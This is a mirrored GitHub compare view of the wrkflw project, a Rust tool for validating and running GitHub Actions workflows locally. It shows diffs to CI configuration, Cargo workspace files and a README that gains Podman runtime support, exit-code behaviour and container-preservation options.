mirror of
https://github.com/bahdotsh/wrkflw.git
synced 2025-12-30 17:06:56 +01:00
Compare commits
46 Commits
v0.4.0
...
wrkflw-exe
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
960f7486a2 | ||
|
|
cb936cd1af | ||
|
|
625b8111f1 | ||
|
|
b2b6e9e08d | ||
|
|
86660ae573 | ||
|
|
886c415fa7 | ||
|
|
460357d9fe | ||
|
|
096ccfa180 | ||
|
|
8765537cfa | ||
|
|
ac708902ef | ||
|
|
d1268d55cf | ||
|
|
a146d94c35 | ||
|
|
7636195380 | ||
|
|
98afdb3372 | ||
|
|
58de01e69f | ||
|
|
880cae3899 | ||
|
|
66e540645d | ||
|
|
79b6389f54 | ||
|
|
5d55812872 | ||
|
|
537bf2f9d1 | ||
|
|
f0b6633cb8 | ||
|
|
181b5c5463 | ||
|
|
1cc3bf98b6 | ||
|
|
af8ac002e4 | ||
|
|
50e62fbc1f | ||
|
|
30659ac5d6 | ||
|
|
b4a73a3cde | ||
|
|
4802e686de | ||
|
|
64621375cb | ||
|
|
cff8e3f4bd | ||
|
|
4251e6469d | ||
|
|
2ba3dbe65b | ||
|
|
7edc6b3645 | ||
|
|
93f18d0327 | ||
|
|
faee4717e1 | ||
|
|
22389736c3 | ||
|
|
699c9250f2 | ||
|
|
48e944a4cc | ||
|
|
d5d1904d0a | ||
|
|
00fa569add | ||
|
|
a97398f949 | ||
|
|
e73b0df520 | ||
|
|
9f51e26eb3 | ||
|
|
3a88b33c83 | ||
|
|
3a9f4f1101 | ||
|
|
470132c5bf |
90
.github/test_organization.md
vendored
90
.github/test_organization.md
vendored
@@ -1,90 +0,0 @@
|
||||
# Test Organization for wrkflw
|
||||
|
||||
Following Rust best practices, we have reorganized the tests in this project to improve maintainability and clarity.
|
||||
|
||||
## Test Structure
|
||||
|
||||
Tests are now organized as follows:
|
||||
|
||||
### 1. Unit Tests
|
||||
|
||||
Unit tests remain in the source files using the `#[cfg(test)]` attribute. These tests are designed to test individual functions and small units of code in isolation.
|
||||
|
||||
Example:
|
||||
```rust
|
||||
// In src/matrix.rs
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_function() {
|
||||
// Test code here
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### 2. Integration Tests
|
||||
|
||||
Integration tests have been moved to the `tests/` directory. These tests import and test the public API of the crate, ensuring that different components work together correctly.
|
||||
|
||||
- `tests/matrix_test.rs` - Tests for matrix expansion functionality
|
||||
- `tests/reusable_workflow_test.rs` - Tests for reusable workflow validation
|
||||
|
||||
### 3. End-to-End Tests
|
||||
|
||||
End-to-end tests are also located in the `tests/` directory. These tests simulate real-world usage scenarios and often involve external dependencies like Docker.
|
||||
|
||||
- `tests/cleanup_test.rs` - Tests for cleanup functionality with Docker containers, networks, etc.
|
||||
|
||||
## Running Tests
|
||||
|
||||
You can run all tests using:
|
||||
```bash
|
||||
cargo test
|
||||
```
|
||||
|
||||
To run only unit tests:
|
||||
```bash
|
||||
cargo test --lib
|
||||
```
|
||||
|
||||
To run only integration tests:
|
||||
```bash
|
||||
cargo test --test matrix_test --test reusable_workflow_test
|
||||
```
|
||||
|
||||
To run only end-to-end tests:
|
||||
```bash
|
||||
cargo test --test cleanup_test
|
||||
```
|
||||
|
||||
To run a specific test:
|
||||
```bash
|
||||
cargo test test_name
|
||||
```
|
||||
|
||||
## CI Configuration
|
||||
|
||||
Our CI workflow has been updated to run all types of tests separately, allowing for better isolation and clearer failure reporting:
|
||||
|
||||
```yaml
|
||||
- name: Run unit tests
|
||||
run: cargo test --lib --verbose
|
||||
|
||||
- name: Run integration tests
|
||||
run: cargo test --test matrix_test --test reusable_workflow_test --verbose
|
||||
|
||||
- name: Run e2e tests (if Docker available)
|
||||
run: cargo test --test cleanup_test --verbose -- --skip docker --skip processes
|
||||
```
|
||||
|
||||
## Writing New Tests
|
||||
|
||||
When adding new tests:
|
||||
|
||||
1. For unit tests, add them to the relevant source file using `#[cfg(test)]`
|
||||
2. For integration tests, add them to the `tests/` directory with a descriptive name like `feature_name_test.rs`
|
||||
3. For end-to-end tests, also add them to the `tests/` directory with a descriptive name
|
||||
|
||||
Follow the existing patterns to ensure consistency.
|
||||
4
.github/workflows/release.yml
vendored
4
.github/workflows/release.yml
vendored
@@ -78,10 +78,6 @@ jobs:
|
||||
target: aarch64-apple-darwin
|
||||
artifact_name: wrkflw
|
||||
asset_name: wrkflw-${{ github.event.inputs.version || github.ref_name }}-macos-arm64
|
||||
- os: windows-latest
|
||||
target: x86_64-pc-windows-msvc
|
||||
artifact_name: wrkflw.exe
|
||||
asset_name: wrkflw-${{ github.event.inputs.version || github.ref_name }}-windows-x86_64
|
||||
|
||||
steps:
|
||||
- name: Checkout code
|
||||
|
||||
43
.github/workflows/rust.yml
vendored
43
.github/workflows/rust.yml
vendored
@@ -1,43 +0,0 @@
|
||||
name: Rust
|
||||
|
||||
on:
|
||||
workflow_dispatch:
|
||||
push:
|
||||
branches: [ "main" ]
|
||||
pull_request:
|
||||
branches: [ "main" ]
|
||||
|
||||
env:
|
||||
CARGO_TERM_COLOR: always
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: macos-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v3
|
||||
- name: Build
|
||||
run: cargo build --verbose
|
||||
|
||||
test-unit:
|
||||
needs: [build]
|
||||
runs-on: macos-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v3
|
||||
- name: Run unit tests
|
||||
run: cargo test --lib --verbose
|
||||
|
||||
test-integration:
|
||||
needs: [build]
|
||||
runs-on: macos-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v3
|
||||
- name: Run integration tests
|
||||
run: cargo test --test matrix_test --test reusable_workflow_test --verbose
|
||||
|
||||
test-e2e:
|
||||
needs: [build]
|
||||
runs-on: macos-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v3
|
||||
- name: Run e2e tests (if Docker available)
|
||||
run: cargo test --test cleanup_test --verbose -- --skip docker --skip processes
|
||||
@@ -2,38 +2,30 @@
|
||||
# This pipeline will build and test the Rust project
|
||||
|
||||
stages:
|
||||
- lint
|
||||
- build
|
||||
- test
|
||||
- release
|
||||
- deploy
|
||||
|
||||
variables:
|
||||
CARGO_HOME: ${CI_PROJECT_DIR}/.cargo
|
||||
RUST_VERSION: stable
|
||||
RUST_VERSION: "1.70.0"
|
||||
CARGO_TERM_COLOR: always
|
||||
|
||||
# Cache dependencies between jobs
|
||||
# Cache settings
|
||||
cache:
|
||||
key: "$CI_COMMIT_REF_SLUG"
|
||||
paths:
|
||||
- .cargo/
|
||||
- target/
|
||||
script:
|
||||
- echo "This is a placeholder - the cache directive doesn't need a script"
|
||||
|
||||
# Lint job - runs rustfmt and clippy
|
||||
lint:
|
||||
stage: lint
|
||||
stage: test
|
||||
image: rust:${RUST_VERSION}
|
||||
script:
|
||||
- rustup component add rustfmt clippy
|
||||
- cargo fmt -- --check
|
||||
- rustup component add clippy
|
||||
- cargo clippy -- -D warnings
|
||||
rules:
|
||||
- if: $CI_PIPELINE_SOURCE == "web"
|
||||
when: always
|
||||
- if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH
|
||||
when: always
|
||||
- if: $CI_COMMIT_TAG
|
||||
when: never
|
||||
- if: '$CI_PIPELINE_SOURCE == "merge_request_event"'
|
||||
when: always
|
||||
allow_failure: true
|
||||
|
||||
# Build job - builds the application
|
||||
build:
|
||||
@@ -43,17 +35,8 @@ build:
|
||||
- cargo build --verbose
|
||||
artifacts:
|
||||
paths:
|
||||
- target/debug/wrkflw
|
||||
- target/debug
|
||||
expire_in: 1 week
|
||||
rules:
|
||||
- if: $CI_PIPELINE_SOURCE == "web"
|
||||
when: always
|
||||
- if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH
|
||||
when: always
|
||||
- if: $CI_COMMIT_TAG
|
||||
when: always
|
||||
- if: '$CI_PIPELINE_SOURCE == "merge_request_event"'
|
||||
when: always
|
||||
|
||||
# Test job - runs unit and integration tests
|
||||
test:
|
||||
@@ -61,21 +44,12 @@ test:
|
||||
image: rust:${RUST_VERSION}
|
||||
script:
|
||||
- cargo test --verbose
|
||||
needs:
|
||||
dependencies:
|
||||
- build
|
||||
rules:
|
||||
- if: $CI_PIPELINE_SOURCE == "web"
|
||||
when: always
|
||||
- if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH
|
||||
when: always
|
||||
- if: $CI_COMMIT_TAG
|
||||
when: always
|
||||
- if: '$CI_PIPELINE_SOURCE == "merge_request_event"'
|
||||
when: always
|
||||
|
||||
# Release job - creates a release build
|
||||
release:
|
||||
stage: release
|
||||
stage: deploy
|
||||
image: rust:${RUST_VERSION}
|
||||
script:
|
||||
- cargo build --release --verbose
|
||||
@@ -92,16 +66,35 @@ release:
|
||||
|
||||
# Custom job for documentation
|
||||
docs:
|
||||
stage: release
|
||||
stage: deploy
|
||||
image: rust:${RUST_VERSION}
|
||||
script:
|
||||
- cargo doc --no-deps
|
||||
- mkdir -p public
|
||||
- cp -r target/doc/* public/
|
||||
artifacts:
|
||||
paths:
|
||||
- target/doc/
|
||||
rules:
|
||||
- if: $CI_PIPELINE_SOURCE == "web" && $BUILD_DOCS == "true"
|
||||
when: always
|
||||
- if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH
|
||||
when: always
|
||||
- when: never
|
||||
- public
|
||||
only:
|
||||
- main
|
||||
|
||||
format:
|
||||
stage: test
|
||||
image: rust:${RUST_VERSION}
|
||||
script:
|
||||
- rustup component add rustfmt
|
||||
- cargo fmt --check
|
||||
allow_failure: true
|
||||
|
||||
pages:
|
||||
stage: deploy
|
||||
image: rust:${RUST_VERSION}
|
||||
script:
|
||||
- cargo doc --no-deps
|
||||
- mkdir -p public
|
||||
- cp -r target/doc/* public/
|
||||
artifacts:
|
||||
paths:
|
||||
- public
|
||||
only:
|
||||
- main
|
||||
221
Cargo.lock
generated
221
Cargo.lock
generated
@@ -1669,6 +1669,15 @@ version = "1.0.20"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "28d3b2b1366ec20994f1fd18c3c594f05c5dd4bc44d8bb0c1c632c8d6829481f"
|
||||
|
||||
[[package]]
|
||||
name = "same-file"
|
||||
version = "1.0.6"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "93fc1dc3aaa9bfed95e02e6eadabb4baf7e3078b0bd1b4d7b6b0b68378900502"
|
||||
dependencies = [
|
||||
"winapi-util",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "schannel"
|
||||
version = "0.1.27"
|
||||
@@ -2182,6 +2191,16 @@ version = "0.9.5"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "0b928f33d975fc6ad9f86c8f283853ad26bdd5b10b7f1542aa2fa15e2289105a"
|
||||
|
||||
[[package]]
|
||||
name = "walkdir"
|
||||
version = "2.5.0"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "29790946404f91d9c5d06f9874efddea1dc06c5efe94541a7d6863108e3a5e4b"
|
||||
dependencies = [
|
||||
"same-file",
|
||||
"winapi-util",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "want"
|
||||
version = "0.3.1"
|
||||
@@ -2315,6 +2334,15 @@ version = "0.4.0"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6"
|
||||
|
||||
[[package]]
|
||||
name = "winapi-util"
|
||||
version = "0.1.9"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "cf221c93e13a30d793f7645a0e7762c55d169dbb0a49671918a2319d289b10bb"
|
||||
dependencies = [
|
||||
"windows-sys 0.59.0",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "winapi-x86_64-pc-windows-gnu"
|
||||
version = "0.4.0"
|
||||
@@ -2517,9 +2545,8 @@ checksum = "1e9df38ee2d2c3c5948ea468a8406ff0db0b29ae1ffde1bcf20ef305bcc95c51"
|
||||
|
||||
[[package]]
|
||||
name = "wrkflw"
|
||||
version = "0.4.0"
|
||||
version = "0.7.0"
|
||||
dependencies = [
|
||||
"async-trait",
|
||||
"bollard",
|
||||
"chrono",
|
||||
"clap",
|
||||
@@ -2530,7 +2557,6 @@ dependencies = [
|
||||
"futures-util",
|
||||
"indexmap 2.8.0",
|
||||
"itertools",
|
||||
"jsonschema",
|
||||
"lazy_static",
|
||||
"libc",
|
||||
"log",
|
||||
@@ -2544,13 +2570,200 @@ dependencies = [
|
||||
"serde",
|
||||
"serde_json",
|
||||
"serde_yaml",
|
||||
"tar",
|
||||
"tempfile",
|
||||
"thiserror",
|
||||
"tokio",
|
||||
"urlencoding",
|
||||
"uuid",
|
||||
"walkdir",
|
||||
"wrkflw-evaluator",
|
||||
"wrkflw-executor",
|
||||
"wrkflw-github",
|
||||
"wrkflw-gitlab",
|
||||
"wrkflw-logging",
|
||||
"wrkflw-matrix",
|
||||
"wrkflw-models",
|
||||
"wrkflw-parser",
|
||||
"wrkflw-runtime",
|
||||
"wrkflw-ui",
|
||||
"wrkflw-utils",
|
||||
"wrkflw-validators",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "wrkflw-evaluator"
|
||||
version = "0.7.0"
|
||||
dependencies = [
|
||||
"colored",
|
||||
"serde_yaml",
|
||||
"wrkflw-models",
|
||||
"wrkflw-validators",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "wrkflw-executor"
|
||||
version = "0.7.0"
|
||||
dependencies = [
|
||||
"async-trait",
|
||||
"bollard",
|
||||
"chrono",
|
||||
"dirs",
|
||||
"futures",
|
||||
"futures-util",
|
||||
"lazy_static",
|
||||
"num_cpus",
|
||||
"once_cell",
|
||||
"regex",
|
||||
"serde",
|
||||
"serde_json",
|
||||
"serde_yaml",
|
||||
"tar",
|
||||
"tempfile",
|
||||
"thiserror",
|
||||
"tokio",
|
||||
"uuid",
|
||||
"wrkflw-logging",
|
||||
"wrkflw-matrix",
|
||||
"wrkflw-models",
|
||||
"wrkflw-parser",
|
||||
"wrkflw-runtime",
|
||||
"wrkflw-utils",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "wrkflw-github"
|
||||
version = "0.7.0"
|
||||
dependencies = [
|
||||
"lazy_static",
|
||||
"regex",
|
||||
"reqwest",
|
||||
"serde",
|
||||
"serde_json",
|
||||
"serde_yaml",
|
||||
"thiserror",
|
||||
"wrkflw-models",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "wrkflw-gitlab"
|
||||
version = "0.7.0"
|
||||
dependencies = [
|
||||
"lazy_static",
|
||||
"regex",
|
||||
"reqwest",
|
||||
"serde",
|
||||
"serde_json",
|
||||
"serde_yaml",
|
||||
"thiserror",
|
||||
"urlencoding",
|
||||
"wrkflw-models",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "wrkflw-logging"
|
||||
version = "0.7.0"
|
||||
dependencies = [
|
||||
"chrono",
|
||||
"once_cell",
|
||||
"serde",
|
||||
"serde_yaml",
|
||||
"wrkflw-models",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "wrkflw-matrix"
|
||||
version = "0.7.0"
|
||||
dependencies = [
|
||||
"indexmap 2.8.0",
|
||||
"serde",
|
||||
"serde_yaml",
|
||||
"thiserror",
|
||||
"wrkflw-models",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "wrkflw-models"
|
||||
version = "0.7.0"
|
||||
dependencies = [
|
||||
"serde",
|
||||
"serde_json",
|
||||
"serde_yaml",
|
||||
"thiserror",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "wrkflw-parser"
|
||||
version = "0.7.0"
|
||||
dependencies = [
|
||||
"jsonschema",
|
||||
"serde",
|
||||
"serde_json",
|
||||
"serde_yaml",
|
||||
"tempfile",
|
||||
"thiserror",
|
||||
"wrkflw-matrix",
|
||||
"wrkflw-models",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "wrkflw-runtime"
|
||||
version = "0.7.0"
|
||||
dependencies = [
|
||||
"async-trait",
|
||||
"futures",
|
||||
"once_cell",
|
||||
"regex",
|
||||
"serde",
|
||||
"serde_yaml",
|
||||
"tempfile",
|
||||
"thiserror",
|
||||
"tokio",
|
||||
"which",
|
||||
"wrkflw-logging",
|
||||
"wrkflw-models",
|
||||
"wrkflw-utils",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "wrkflw-ui"
|
||||
version = "0.7.0"
|
||||
dependencies = [
|
||||
"chrono",
|
||||
"crossterm 0.26.1",
|
||||
"futures",
|
||||
"ratatui",
|
||||
"regex",
|
||||
"reqwest",
|
||||
"serde",
|
||||
"serde_json",
|
||||
"serde_yaml",
|
||||
"tokio",
|
||||
"wrkflw-evaluator",
|
||||
"wrkflw-executor",
|
||||
"wrkflw-github",
|
||||
"wrkflw-logging",
|
||||
"wrkflw-models",
|
||||
"wrkflw-utils",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "wrkflw-utils"
|
||||
version = "0.7.0"
|
||||
dependencies = [
|
||||
"nix",
|
||||
"serde",
|
||||
"serde_yaml",
|
||||
"wrkflw-models",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "wrkflw-validators"
|
||||
version = "0.7.0"
|
||||
dependencies = [
|
||||
"serde",
|
||||
"serde_yaml",
|
||||
"wrkflw-matrix",
|
||||
"wrkflw-models",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
|
||||
13
Cargo.toml
13
Cargo.toml
@@ -1,6 +1,11 @@
|
||||
[package]
|
||||
name = "wrkflw"
|
||||
version = "0.4.0"
|
||||
[workspace]
|
||||
members = [
|
||||
"crates/*"
|
||||
]
|
||||
resolver = "2"
|
||||
|
||||
[workspace.package]
|
||||
version = "0.7.0"
|
||||
edition = "2021"
|
||||
description = "A GitHub Actions workflow validator and executor"
|
||||
documentation = "https://github.com/bahdotsh/wrkflw"
|
||||
@@ -10,7 +15,7 @@ keywords = ["workflows", "github", "local"]
|
||||
categories = ["command-line-utilities"]
|
||||
license = "MIT"
|
||||
|
||||
[dependencies]
|
||||
[workspace.dependencies]
|
||||
clap = { version = "4.3", features = ["derive"] }
|
||||
colored = "2.0"
|
||||
serde = { version = "1.0", features = ["derive"] }
|
||||
|
||||
257
README.md
257
README.md
@@ -13,23 +13,59 @@ WRKFLW is a powerful command-line tool for validating and executing GitHub Actio
|
||||
## Features
|
||||
|
||||
- **TUI Interface**: A full-featured terminal user interface for managing and monitoring workflow executions
|
||||
- **Validate Workflow Files**: Check for syntax errors and common mistakes in GitHub Actions workflow files
|
||||
- **Execute Workflows Locally**: Run workflows directly on your machine using Docker containers
|
||||
- **Emulation Mode**: Optional execution without Docker by emulating the container environment locally
|
||||
- **Validate Workflow Files**: Check for syntax errors and common mistakes in GitHub Actions workflow files with proper exit codes for CI/CD integration
|
||||
- **Execute Workflows Locally**: Run workflows directly on your machine using Docker or Podman containers
|
||||
- **Multiple Container Runtimes**: Support for Docker, Podman, and emulation mode for maximum flexibility
|
||||
- **Job Dependency Resolution**: Automatically determines the correct execution order based on job dependencies
|
||||
- **Docker Integration**: Execute workflow steps in isolated Docker containers with proper environment setup
|
||||
- **Container Integration**: Execute workflow steps in isolated containers with proper environment setup
|
||||
- **GitHub Context**: Provides GitHub-like environment variables and workflow commands
|
||||
- **Multiple Runtime Modes**: Choose between Docker containers or local emulation for maximum flexibility
|
||||
- **Rootless Execution**: Podman support enables running containers without root privileges
|
||||
- **Action Support**: Supports various GitHub Actions types:
|
||||
- Docker container actions
|
||||
- JavaScript actions
|
||||
- Composite actions
|
||||
- Local actions
|
||||
- **Special Action Handling**: Native handling for commonly used actions like `actions/checkout`
|
||||
- **Reusable Workflows (Caller Jobs)**: Execute jobs that call reusable workflows via `jobs.<id>.uses` (local path or `owner/repo/path@ref`)
|
||||
- **Output Capturing**: View logs, step outputs, and execution details
|
||||
- **Parallel Job Execution**: Runs independent jobs in parallel for faster workflow execution
|
||||
- **Trigger Workflows Remotely**: Manually trigger workflow runs on GitHub or GitLab
|
||||
|
||||
## Requirements
|
||||
|
||||
### Container Runtime (Optional)
|
||||
|
||||
WRKFLW supports multiple container runtimes for isolated execution:
|
||||
|
||||
- **Docker**: The default container runtime. Install from [docker.com](https://docker.com)
|
||||
- **Podman**: A rootless container runtime. Perfect for environments where Docker isn't available or permitted. Install from [podman.io](https://podman.io)
|
||||
- **Emulation**: No container runtime required. Executes commands directly on the host system
|
||||
|
||||
### Podman Support
|
||||
|
||||
Podman is particularly useful in environments where:
|
||||
- Docker installation is not permitted by your organization
|
||||
- Root privileges are not available for Docker daemon
|
||||
- You prefer rootless container execution
|
||||
- Enhanced security through daemonless architecture is desired
|
||||
|
||||
To use Podman:
|
||||
```bash
|
||||
# Install Podman (varies by OS)
|
||||
# On macOS with Homebrew:
|
||||
brew install podman
|
||||
|
||||
# On Ubuntu/Debian:
|
||||
sudo apt-get install podman
|
||||
|
||||
# Initialize Podman machine (macOS/Windows)
|
||||
podman machine init
|
||||
podman machine start
|
||||
|
||||
# Use with wrkflw
|
||||
wrkflw run --runtime podman .github/workflows/ci.yml
|
||||
```
|
||||
|
||||
## Installation
|
||||
|
||||
The recommended way to install `wrkflw` is using Rust's package manager, Cargo:
|
||||
@@ -75,21 +111,63 @@ wrkflw validate path/to/workflow.yml
|
||||
# Validate workflows in a specific directory
|
||||
wrkflw validate path/to/workflows
|
||||
|
||||
# Validate multiple files and/or directories (GitHub and GitLab are auto-detected)
|
||||
wrkflw validate path/to/flow-1.yml path/to/flow-2.yml path/to/workflows
|
||||
|
||||
# Force GitLab parsing for all provided paths
|
||||
wrkflw validate --gitlab .gitlab-ci.yml other.gitlab-ci.yml
|
||||
|
||||
# Validate with verbose output
|
||||
wrkflw validate --verbose path/to/workflow.yml
|
||||
|
||||
# Validate GitLab CI pipelines
|
||||
wrkflw validate .gitlab-ci.yml --gitlab
|
||||
|
||||
# Disable exit codes for custom error handling (default: enabled)
|
||||
wrkflw validate --no-exit-code path/to/workflow.yml
|
||||
```
|
||||
|
||||
#### Exit Codes for CI/CD Integration
|
||||
|
||||
By default, `wrkflw validate` sets the exit code to `1` when validation fails, making it perfect for CI/CD pipelines and scripts:
|
||||
|
||||
```bash
|
||||
# In CI/CD scripts - validation failure will cause the script to exit
|
||||
if ! wrkflw validate; then
|
||||
echo "❌ Workflow validation failed!"
|
||||
exit 1
|
||||
fi
|
||||
echo "✅ All workflows are valid!"
|
||||
|
||||
# For custom error handling, disable exit codes
|
||||
wrkflw validate --no-exit-code
|
||||
if [ $? -eq 0 ]; then
|
||||
echo "Validation completed (check output for details)"
|
||||
fi
|
||||
```
|
||||
|
||||
**Exit Code Behavior:**
|
||||
- `0`: All validations passed successfully
|
||||
- `1`: One or more validation failures detected
|
||||
- `2`: Command usage error (invalid arguments, file not found, etc.)
|
||||
|
||||
### Running Workflows in CLI Mode
|
||||
|
||||
```bash
|
||||
# Run a workflow with Docker (default)
|
||||
wrkflw run .github/workflows/ci.yml
|
||||
|
||||
# Run a workflow in emulation mode (without Docker)
|
||||
wrkflw run --emulate .github/workflows/ci.yml
|
||||
# Run a workflow with Podman instead of Docker
|
||||
wrkflw run --runtime podman .github/workflows/ci.yml
|
||||
|
||||
# Run a workflow in emulation mode (without containers)
|
||||
wrkflw run --runtime emulation .github/workflows/ci.yml
|
||||
|
||||
# Run with verbose output
|
||||
wrkflw run --verbose .github/workflows/ci.yml
|
||||
|
||||
# Preserve failed containers for debugging
|
||||
wrkflw run --preserve-containers-on-failure .github/workflows/ci.yml
|
||||
```
|
||||
|
||||
### Using the TUI Interface
|
||||
@@ -104,8 +182,11 @@ wrkflw tui path/to/workflows
|
||||
# Open TUI with a specific workflow pre-selected
|
||||
wrkflw tui path/to/workflow.yml
|
||||
|
||||
# Open TUI with Podman runtime
|
||||
wrkflw tui --runtime podman
|
||||
|
||||
# Open TUI in emulation mode
|
||||
wrkflw tui --emulate
|
||||
wrkflw tui --runtime emulation
|
||||
```
|
||||
|
||||
### Triggering Workflows Remotely
|
||||
@@ -129,7 +210,7 @@ The terminal user interface provides an interactive way to manage workflows:
|
||||
- **r**: Run all selected workflows
|
||||
- **a**: Select all workflows
|
||||
- **n**: Deselect all workflows
|
||||
- **e**: Toggle between Docker and Emulation mode
|
||||
- **e**: Cycle through runtime modes (Docker → Podman → Emulation)
|
||||
- **v**: Toggle between Execution and Validation mode
|
||||
- **Esc**: Back / Exit detailed view
|
||||
- **q**: Quit application
|
||||
@@ -140,17 +221,25 @@ The terminal user interface provides an interactive way to manage workflows:
|
||||
|
||||
```bash
|
||||
$ wrkflw validate .github/workflows/rust.yml
|
||||
Validating GitHub workflow file: .github/workflows/rust.yml... Validating 1 workflow file(s)...
|
||||
✅ Valid: .github/workflows/rust.yml
|
||||
|
||||
Validating workflows in: .github/workflows/rust.yml
|
||||
============================================================
|
||||
✅ Valid: rust.yml
|
||||
------------------------------------------------------------
|
||||
Summary: 1 valid, 0 invalid
|
||||
|
||||
Summary
|
||||
============================================================
|
||||
✅ 1 valid workflow file(s)
|
||||
$ echo $?
|
||||
0
|
||||
|
||||
All workflows are valid! 🎉
|
||||
# Example with validation failure
|
||||
$ wrkflw validate .github/workflows/invalid.yml
|
||||
Validating GitHub workflow file: .github/workflows/invalid.yml... Validating 1 workflow file(s)...
|
||||
❌ Invalid: .github/workflows/invalid.yml
|
||||
1. Job 'test' is missing 'runs-on' field
|
||||
2. Job 'test' is missing 'steps' section
|
||||
|
||||
Summary: 0 valid, 1 invalid
|
||||
|
||||
$ echo $?
|
||||
1
|
||||
```
|
||||
|
||||
### Running a Workflow
|
||||
@@ -184,20 +273,22 @@ $ wrkflw
|
||||
# This will automatically load .github/workflows files into the TUI
|
||||
```
|
||||
|
||||
## Requirements
|
||||
## System Requirements
|
||||
|
||||
- Rust 1.67 or later
|
||||
- Docker (optional, for container-based execution)
|
||||
- When not using Docker, the emulation mode can run workflows using your local system tools
|
||||
- Container Runtime (optional, for container-based execution):
|
||||
- **Docker**: Traditional container runtime
|
||||
- **Podman**: Rootless alternative to Docker
|
||||
- **None**: Emulation mode runs workflows using local system tools
|
||||
|
||||
## How It Works
|
||||
|
||||
WRKFLW parses your GitHub Actions workflow files and executes each job and step in the correct order. For Docker mode, it creates containers that closely match GitHub's runner environments. The workflow execution process:
|
||||
WRKFLW parses your GitHub Actions workflow files and executes each job and step in the correct order. For container modes (Docker/Podman), it creates containers that closely match GitHub's runner environments. The workflow execution process:
|
||||
|
||||
1. **Parsing**: Reads and validates the workflow YAML structure
|
||||
2. **Dependency Resolution**: Creates an execution plan based on job dependencies
|
||||
3. **Environment Setup**: Prepares GitHub-like environment variables and context
|
||||
4. **Execution**: Runs each job and step either in Docker containers or through local emulation
|
||||
4. **Execution**: Runs each job and step either in containers (Docker/Podman) or through local emulation
|
||||
5. **Monitoring**: Tracks progress and captures outputs in the TUI or command line
|
||||
|
||||
## Advanced Features
|
||||
@@ -221,20 +312,74 @@ WRKFLW supports composite actions, which are actions made up of multiple steps.
|
||||
|
||||
### Container Cleanup
|
||||
|
||||
WRKFLW automatically cleans up any Docker containers created during workflow execution, even if the process is interrupted with Ctrl+C.
|
||||
WRKFLW automatically cleans up any containers created during workflow execution (Docker/Podman), even if the process is interrupted with Ctrl+C.
|
||||
|
||||
For debugging failed workflows, you can preserve containers that fail by using the `--preserve-containers-on-failure` flag:
|
||||
|
||||
```bash
|
||||
# Preserve failed containers for debugging
|
||||
wrkflw run --preserve-containers-on-failure .github/workflows/build.yml
|
||||
|
||||
# Also available in TUI mode
|
||||
wrkflw tui --preserve-containers-on-failure
|
||||
```
|
||||
|
||||
When a container fails with this flag enabled, WRKFLW will:
|
||||
- Keep the failed container running instead of removing it
|
||||
- Log the container ID and provide inspection instructions
|
||||
- Show a message like: `Preserving container abc123 for debugging (exit code: 1). Use 'docker exec -it abc123 bash' to inspect.` (Docker)
|
||||
- Or: `Preserving container abc123 for debugging (exit code: 1). Use 'podman exec -it abc123 bash' to inspect.` (Podman)
|
||||
|
||||
This allows you to inspect the exact state of the container when the failure occurred, examine files, check environment variables, and debug issues more effectively.
|
||||
|
||||
### Podman-Specific Features
|
||||
|
||||
When using Podman as the container runtime, you get additional benefits:
|
||||
|
||||
**Rootless Operation:**
|
||||
```bash
|
||||
# Run workflows without root privileges
|
||||
wrkflw run --runtime podman .github/workflows/ci.yml
|
||||
```
|
||||
|
||||
**Enhanced Security:**
|
||||
- Daemonless architecture reduces attack surface
|
||||
- User namespaces provide additional isolation
|
||||
- No privileged daemon required
|
||||
|
||||
**Container Inspection:**
|
||||
```bash
|
||||
# List preserved containers
|
||||
podman ps -a --filter "name=wrkflw-"
|
||||
|
||||
# Inspect a preserved container's filesystem (without executing)
|
||||
podman mount <container-id>
|
||||
|
||||
# Or run a new container with the same volumes
|
||||
podman run --rm -it --volumes-from <failed-container> ubuntu:20.04 bash
|
||||
|
||||
# Clean up all wrkflw containers
|
||||
podman ps -a --filter "name=wrkflw-" --format "{{.Names}}" | xargs podman rm -f
|
||||
```
|
||||
|
||||
**Compatibility:**
|
||||
- Drop-in replacement for Docker workflows
|
||||
- Same CLI options and behavior
|
||||
- Identical container execution environment
|
||||
|
||||
## Limitations
|
||||
|
||||
### Supported Features
|
||||
- ✅ Basic workflow syntax and validation (all YAML syntax checks, required fields, and structure)
|
||||
- ✅ Basic workflow syntax and validation (all YAML syntax checks, required fields, and structure) with proper exit codes for CI/CD integration
|
||||
